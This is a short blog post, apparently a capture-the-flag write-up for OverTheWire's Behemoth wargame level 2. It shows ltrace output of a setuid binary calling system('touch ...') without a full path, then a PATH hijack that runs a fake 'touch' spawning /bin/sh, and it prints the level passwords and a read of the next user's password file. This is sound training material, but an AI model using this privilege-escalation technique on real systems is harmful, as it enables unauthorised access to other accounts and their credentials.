# Behemoth wargame: Level 2 


# ssh behemoth2@behemoth.labs.overthewire.org
behemoth2@behemoth.labs.overthewire.org's password:65696d61687175756f66

behemoth2@melissa$ file /behemoth/behemoth2
/behemoth/behemoth2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth2@melissa$ ltrace /behemoth/behemoth2
__libc_start_main(0x8048534, 1, -10236, 0x8048620, 0x8048680 
getpid()                                                                     = 6046
sprintf("touch 6046", "touch %d", 6046)                                      = 10
__lxstat(3, "6046", 0xffffd6d4)                                              = -1
unlink("6046")                                                               = -1
system("touch 6046"touch: cannot touch `6046': Permission denied
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 256
sleep(2000^C <unfinished ...>
--- SIGINT (Interrupt) ---
+++ killed by SIGINT +++
behemoth2@melissa$ cat > /tmp/b2/touch << eof
> /bin/sh
> eof
behemoth2@melissa$ chmod +x /tmp/b2/touch
behemoth2@melissa$ PATH=/tmp/b2:$PATH /behemoth/behemoth2
$ /usr/bin/whoami
behemoth3
$ /bin/cat /etc/behemoth_pass/behemoth3
6e69657465696469656c
Posted by t0n1
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)